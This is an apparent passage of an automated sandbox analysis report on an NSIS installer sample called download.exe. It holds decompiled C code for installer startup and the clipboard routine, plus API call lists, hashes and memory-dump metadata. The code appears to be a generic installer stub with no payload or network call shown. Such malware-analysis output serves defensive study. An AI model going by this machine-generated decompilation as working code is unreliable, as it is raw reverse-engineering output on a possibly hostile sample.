														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406315(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405699( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											_t177 =  *0x7a2f60; // 0x0
											if(_t177 == 0) {
												L42:
												 *0x7a300c =  *0x7a300c | 0xffffffff;
												 *(_t164 + 0x18) = E004037AB( *0x7a300c);
												goto L43;
											}
											_t153 = E00405940(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E00405604(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\Arthur\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\Arthur\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004055E7();
														} else {
															E0040556A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize"; // 0x43
														if(_t189 == 0) {
															E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t162);
														}
														E00405F7D("kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														do {
															_t86 =  *0x7a2f54; // 0xae4de0
															E00405F9F(0, 0x79e100, _t157, 0x79e100,  *((intOrPtr*)(_t86 + 0x120)));
															DeleteFileA(0x79e100);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\download.exe", 0x79e100, 1) != 0) {
																E00405D5C(_t137, 0x79e100, 0);
																_t92 =  *0x7a2f54; // 0xae4de0
																E00405F9F(0, 0x79e100, _t157, 0x79e100,  *((intOrPtr*)(_t92 + 0x124)));
																_t94 = E0040561C(0x79e100);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															"77791232" =  &("77791232"[1]);
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405D5C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405A03(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t154);
												E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004031B8(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004031B8(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x7a3000 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}




































                                                      0x004031f9
                                                      0x004031fd
                                                      0x00403205
                                                      0x00403209
                                                      0x0040320e
                                                      0x0040321a
                                                      0x00403223
                                                      0x00403228
                                                      0x0040322b
                                                      0x00403232
                                                      0x00403239
                                                      0x00403239
                                                      0x00403232
                                                      0x0040323b
                                                      0x00403240
                                                      0x00403241
                                                      0x0040324d
                                                      0x00403251
                                                      0x00403257
                                                      0x00403265
                                                      0x0040326a
                                                      0x00403271
                                                      0x00403275
                                                      0x00403279
                                                      0x0040327b
                                                      0x0040327b
                                                      0x00403279
                                                      0x00403283
                                                      0x0040328a
                                                      0x00403290
                                                      0x004032a6
                                                      0x004032b6
                                                      0x004032bb
                                                      0x004032c1
                                                      0x004032c8
                                                      0x004032d4
                                                      0x004032de
                                                      0x004032e0
                                                      0x004032e2
                                                      0x004032e7
                                                      0x004032e7
                                                      0x004032f7
                                                      0x004032fd
                                                      0x004033c6
                                                      0x004033c6
                                                      0x004033c8
                                                      0x004033ca
                                                      0x00000000
                                                      0x00000000
                                                      0x00403306
                                                      0x00403309
                                                      0x00403311
                                                      0x00403311
                                                      0x00403314
                                                      0x00403319
                                                      0x0040331b
                                                      0x0040331b
                                                      0x0040331c
                                                      0x0040331c
                                                      0x00403321
                                                      0x00403324
                                                      0x004033b6
                                                      0x004033bb
                                                      0x004033c0
                                                      0x004033c3
                                                      0x004033c5
                                                      0x004033c5
                                                      0x004033c5
                                                      0x00000000
                                                      0x0040332a
                                                      0x0040332a
                                                      0x0040332b
                                                      0x0040332e
                                                      0x00403346
                                                      0x00403371
                                                      0x00403373
                                                      0x00403386
                                                      0x004033b1
                                                      0x004033b4
                                                      0x004033d2
                                                      0x004033d5
                                                      0x004033de
                                                      0x004033e3
                                                      0x004033e9
                                                      0x004033f4
                                                      0x004033f6
                                                      0x004033fb
                                                      0x004033fd
                                                      0x00403455
                                                      0x0040345a
                                                      0x00403464
                                                      0x0040346b
                                                      0x0040346f
                                                      0x00403503
                                                      0x00403503
                                                      0x00403508
                                                      0x0040350e
                                                      0x00403513
                                                      0x00403637
                                                      0x0040363d
                                                      0x004036b9
                                                      0x004036b9
                                                      0x004036be
                                                      0x004036c1
                                                      0x004036c3
                                                      0x004036c3
                                                      0x004036cb
                                                      0x004036cb
                                                      0x0040364d
                                                      0x00403655
                                                      0x00403657
                                                      0x00403658
                                                      0x00403665
                                                      0x00403678
                                                      0x00403680
                                                      0x00403684
                                                      0x00403684
                                                      0x0040368c
                                                      0x00403691
                                                      0x00403698
                                                      0x004036a6
                                                      0x004036a8
                                                      0x004036ae
                                                      0x004036b0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040369a
                                                      0x004036a0
                                                      0x004036a2
                                                      0x004036a4
                                                      0x004036b2
                                                      0x004036b4
                                                      0x00000000
                                                      0x004036b4
                                                      0x00000000
                                                      0x004036a4
                                                      0x00403698
                                                      0x00403522
                                                      0x00403529
                                                      0x00403529
                                                      0x00403475
                                                      0x0040347b
                                                      0x004034f3
                                                      0x004034f3
                                                      0x004034ff
                                                      0x00000000
                                                      0x004034ff
                                                      0x00403484
                                                      0x00403488
                                                      0x004034be
                                                      0x004034be
                                                      0x004034c0
                                                      0x004034c8
                                                      0x0040353a
                                                      0x0040353c
                                                      0x00403543
                                                      0x0040354b
                                                      0x0040354b
                                                      0x00403556
                                                      0x0040355b
                                                      0x0040356a
                                                      0x0040356e
                                                      0x0040356f
                                                      0x00403578
                                                      0x00403571
                                                      0x00403571
                                                      0x00403571
                                                      0x0040357e
                                                      0x00403584
                                                      0x0040358a
                                                      0x00403592
                                                      0x00403592
                                                      0x004035a0
                                                      0x004035a5
                                                      0x004035b7
                                                      0x004035c5
                                                      0x004035c5
                                                      0x004035d1
                                                      0x004035d7
                                                      0x004035e1
                                                      0x004035f7
                                                      0x004035fc
                                                      0x00403608
                                                      0x0040360e
                                                      0x00403615
                                                      0x00403618
                                                      0x0040361e
                                                      0x0040361e
                                                      0x00403615
                                                      0x00403622
                                                      0x00403628
                                                      0x00403628
                                                      0x0040362d
                                                      0x0040362d
                                                      0x00000000
                                                      0x0040356a
                                                      0x004034ca
                                                      0x004034cc
                                                      0x004034d7
                                                      0x00000000
                                                      0x00000000
                                                      0x004034df
                                                      0x004034ea
                                                      0x004034ef
                                                      0x00000000
                                                      0x004034ef
                                                      0x004034b3
                                                      0x004034b5
                                                      0x004034b9
                                                      0x004034bc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004034bc
                                                      0x00000000
                                                      0x004034b5
                                                      0x00403405
                                                      0x00403411
                                                      0x00403416
                                                      0x0040341b
                                                      0x0040341d
                                                      0x00000000
                                                      0x00000000
                                                      0x00403425
                                                      0x0040342d
                                                      0x0040343e
                                                      0x00403446
                                                      0x00403448
                                                      0x0040344d
                                                      0x0040344f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040344f
                                                      0x00000000
                                                      0x004033b4
                                                      0x00403375
                                                      0x00403378
                                                      0x0040337b
                                                      0x00403381
                                                      0x00403381
                                                      0x00403381
                                                      0x00403381
                                                      0x00000000
                                                      0x00403381
                                                      0x0040337d
                                                      0x0040337f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040337f
                                                      0x00403330
                                                      0x00403333
                                                      0x00403336
                                                      0x0040333c
                                                      0x0040333c
                                                      0x00000000
                                                      0x0040333c
                                                      0x00403338
                                                      0x0040333a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040333a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040330b
                                                      0x0040330b
                                                      0x0040330b
                                                      0x0040330c
                                                      0x0040330c
                                                      0x00000000
                                                      0x0040330b
                                                      0x00000000

                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 0040320E
                                                      • GetVersion.KERNEL32 ref: 00403214
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403247
                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403283
                                                      • OleInitialize.OLE32(00000000), ref: 0040328A
                                                      • SHGetFileInfoA.SHELL32(0079E500,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032A6
                                                      • GetCommandLineA.KERNEL32(Doktorgraden Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032BB
                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\download.exe",00000020,"C:\Users\user\Desktop\download.exe",00000000,?,00000006,00000008,0000000A), ref: 004032F7
                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033F4
                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403405
                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403411
                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403425
                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040342D
                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040343E
                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403446
                                                      • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040345A
                                                        • Part of subcall function 00406315: GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                        • Part of subcall function 00406315: GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                        • Part of subcall function 004037AB: GetUserDefaultUILanguage.KERNELBASE(00000002,75A63410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\download.exe",00000000), ref: 004037C5
                                                        • Part of subcall function 004037AB: lstrlenA.KERNEL32(Call,00000000,00000000,00000000,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize,1033,0079F540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F540,00000000,00000002,75A63410), ref: 0040389B
                                                        • Part of subcall function 004037AB: lstrcmpiA.KERNEL32(?,.exe), ref: 004038AE
                                                        • Part of subcall function 004037AB: GetFileAttributesA.KERNEL32(Call), ref: 004038B9
                                                        • Part of subcall function 004037AB: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize), ref: 00403902
                                                        • Part of subcall function 004037AB: RegisterClassA.USER32(007A26E0), ref: 0040393F
                                                        • Part of subcall function 004036D1: CloseHandle.KERNEL32(000002DC,00403508,?,?,00000006,00000008,0000000A), ref: 004036DC
                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403508
                                                      • ExitProcess.KERNEL32 ref: 00403529
                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403646
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040364D
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403665
                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403684
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A8
                                                      • ExitProcess.KERNEL32 ref: 004036CB
                                                        • Part of subcall function 00405699: MessageBoxIndirectA.USER32(0040A218), ref: 004056F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                      • String ID: "$"C:\Users\user\Desktop\download.exe"$.tmp$1033$77791232$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$C:\Users\user\Desktop$C:\Users\user\Desktop\download.exe$Doktorgraden Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu
                                                      • API String ID: 1314998376-3786389085
                                                      • Opcode ID: e0b5db9666b9a3f6237ddd60c5d2e51e03b24921c130a1ce91c854595f011bcd
                                                      • Instruction ID: 7bf8744e0b649f959f8498b36092dc0538a6711c388ee02d62fe24b7258f1436
                                                      • Opcode Fuzzy Hash: e0b5db9666b9a3f6237ddd60c5d2e51e03b24921c130a1ce91c854595f011bcd
                                                      • Instruction Fuzzy Hash: 42C1E670104741AAD7216F759D89A2F3EACAF86706F04447FF582B51E2DB7C8A058B2F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004051E2 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 134 4051e2-4051fe 135 405204-4052cb GetDlgItem * 3 call 404051 call 404942 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 40538d-405393 134->136 154 4052e9-4052ec 135->154 155 4052cd-4052e7 SendMessageA * 2 135->155 138 405395-4053b7 GetDlgItem CreateThread CloseHandle 136->138 139 4053bd-4053c9 136->139 138->139 140 4053eb-4053f1 139->140 141 4053cb-4053d1 139->141 145 4053f3-4053f9 140->145 146 405446-405449 140->146 143 4053d3-4053e6 ShowWindow * 2 call 404051 141->143 144 40540c-405413 call 404083 141->144 143->140 158 405418-40541c 144->158 150 4053fb-405407 call 403ff5 145->150 151 40541f-40542f ShowWindow 145->151 146->144 148 40544b-405451 146->148 148->144 156 405453-405466 SendMessageA 148->156 150->144 159 405431-40543a call 4050a4 151->159 160 40543f-405441 call 403ff5 151->160 161 4052fc-405313 call 40401c 154->161 162 4052ee-4052fa SendMessageA 154->162 155->154 163 405563-405565 156->163 164 40546c-405498 CreatePopupMenu call 405f9f AppendMenuA 156->164 159->160 160->146 173 405315-405329 ShowWindow 161->173 174 405349-40536a GetDlgItem SendMessageA 161->174 162->161 163->158 171 40549a-4054aa GetWindowRect 164->171 172 4054ad-4054c3 TrackPopupMenu 164->172 171->172 172->163 175 4054c9-4054e3 172->175 176 405338 173->176 177 40532b-405336 ShowWindow 173->177 174->163 178 405370-405388 SendMessageA * 2 174->178 179 4054e8-405503 SendMessageA 175->179 180 40533e-405344 call 404051 176->180 177->180 178->163 179->179 181 405505-405525 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405527-405547 SendMessageA 181->183 183->183 184 405549-40555d GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                                      C-Code - Quality: 96%
                                                      			E004051E2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x7a2724; // 0x1040e
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E00405176, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405F9F(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x79f540;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x7a270c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x7a2f48, 8);
							__eflags =  *0x7a2fec - _t150; // 0x0
							if(__eflags == 0) {
								_t113 =  *0x79ed18; // 0xae4f0c
								_t55 = _t113 + 0x34; // 0xffffffd4
								E004050A4( *_t55, _t150);
							}
							E00403FF5(1);
							goto L25;
						}
						 *0x79e910 = 2;
						E00403FF5(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404083(_t157, _a12, _a16);
						}
						ShowWindow( *0x7a2710, _t150);
						ShowWindow(_v8, 8);
						E00404051(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x7a2f54; // 0xae4de0
				_t12 = _t124 + 0x5c; // 0x0
				_t13 = _t124 + 0x60; // 0xff00
				_a12 =  *_t12;
				_a8 =  *_t13;
				 *0x7a2710 = GetDlgItem(_a4, 0x403);
				 *0x7a2708 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2724 = _t128;
				_v8 = _t128;
				E00404051( *0x7a2710);
				 *0x7a2714 = E00404942(4);
				 *0x7a272c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040401C(_a4);
				if(( *0x7a2f5c & 0x00000003) != 0) {
					ShowWindow( *0x7a2710, _t150);
					if(( *0x7a2f5c & 0x00000002) != 0) {
						 *0x7a2710 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404051( *0x7a2708);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x7a2f5c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}





































                                                      0x004051e8
                                                      0x004051f0
                                                      0x004051f3
                                                      0x004051fb
                                                      0x004051fe
                                                      0x0040538d
                                                      0x00405393
                                                      0x004053b0
                                                      0x004053b7
                                                      0x004053b7
                                                      0x004053c3
                                                      0x004053c9
                                                      0x004053eb
                                                      0x004053eb
                                                      0x004053f1
                                                      0x00405446
                                                      0x00405446
                                                      0x00405449
                                                      0x00000000
                                                      0x00000000
                                                      0x0040544b
                                                      0x0040544e
                                                      0x00405451
                                                      0x00000000
                                                      0x00000000
                                                      0x0040545b
                                                      0x00405461
                                                      0x00405463
                                                      0x00405466
                                                      0x00405563
                                                      0x00000000
                                                      0x00405563
                                                      0x00405475
                                                      0x00405481
                                                      0x0040548a
                                                      0x00405491
                                                      0x00405495
                                                      0x00405498
                                                      0x004054a1
                                                      0x004054a7
                                                      0x004054aa
                                                      0x004054aa
                                                      0x004054ba
                                                      0x004054c0
                                                      0x004054c3
                                                      0x004054ce
                                                      0x004054ce
                                                      0x004054cf
                                                      0x004054d2
                                                      0x004054d9
                                                      0x004054e0
                                                      0x004054e8
                                                      0x004054e8
                                                      0x004054f6
                                                      0x004054fc
                                                      0x004054ff
                                                      0x004054ff
                                                      0x00405506
                                                      0x0040550c
                                                      0x00405515
                                                      0x0040551c
                                                      0x00405525
                                                      0x00405527
                                                      0x0040552a
                                                      0x00405539
                                                      0x0040553b
                                                      0x0040553e
                                                      0x0040553f
                                                      0x00405542
                                                      0x00405543
                                                      0x00405544
                                                      0x00405544
                                                      0x0040554c
                                                      0x00405557
                                                      0x0040555d
                                                      0x0040555d
                                                      0x00000000
                                                      0x004054c3
                                                      0x004053f3
                                                      0x004053f9
                                                      0x00405427
                                                      0x00405429
                                                      0x0040542f
                                                      0x00405431
                                                      0x00405437
                                                      0x0040543a
                                                      0x0040543a
                                                      0x00405441
                                                      0x00000000
                                                      0x00405441
                                                      0x004053fd
                                                      0x00405407
                                                      0x00000000
                                                      0x004053cb
                                                      0x004053cb
                                                      0x004053d1
                                                      0x0040540c
                                                      0x00000000
                                                      0x00405413
                                                      0x004053da
                                                      0x004053e1
                                                      0x004053e6
                                                      0x00000000
                                                      0x004053e6
                                                      0x004053c9
                                                      0x00405204
                                                      0x00405208
                                                      0x00405210
                                                      0x00405214
                                                      0x00405217
                                                      0x0040521a
                                                      0x0040521d
                                                      0x00405220
                                                      0x00405221
                                                      0x00405222
                                                      0x00405232
                                                      0x00405235
                                                      0x0040523b
                                                      0x0040523e
                                                      0x00405248
                                                      0x00405257
                                                      0x0040525f
                                                      0x00405267
                                                      0x0040526c
                                                      0x0040526f
                                                      0x0040527b
                                                      0x00405284
                                                      0x0040528d
                                                      0x004052af
                                                      0x004052b5
                                                      0x004052c6
                                                      0x004052cb
                                                      0x004052d9
                                                      0x004052e7
                                                      0x004052e7
                                                      0x004052ec
                                                      0x004052fa
                                                      0x004052fa
                                                      0x004052ff
                                                      0x00405302
                                                      0x00405307
                                                      0x00405313
                                                      0x0040531c
                                                      0x00405329
                                                      0x00405338
                                                      0x0040532b
                                                      0x00405330
                                                      0x00405330
                                                      0x00405344
                                                      0x00405344
                                                      0x00405358
                                                      0x00405361
                                                      0x0040536a
                                                      0x0040537a
                                                      0x00405386
                                                      0x00405386
                                                      0x00000000

                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405241
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405250
                                                      • GetClientRect.USER32(?,?), ref: 0040528D
                                                      • GetSystemMetrics.USER32(00000002), ref: 00405294
                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052B5
                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052C6
                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052D9
                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052E7
                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052FA
                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040531C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405330
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405351
                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405361
                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040537A
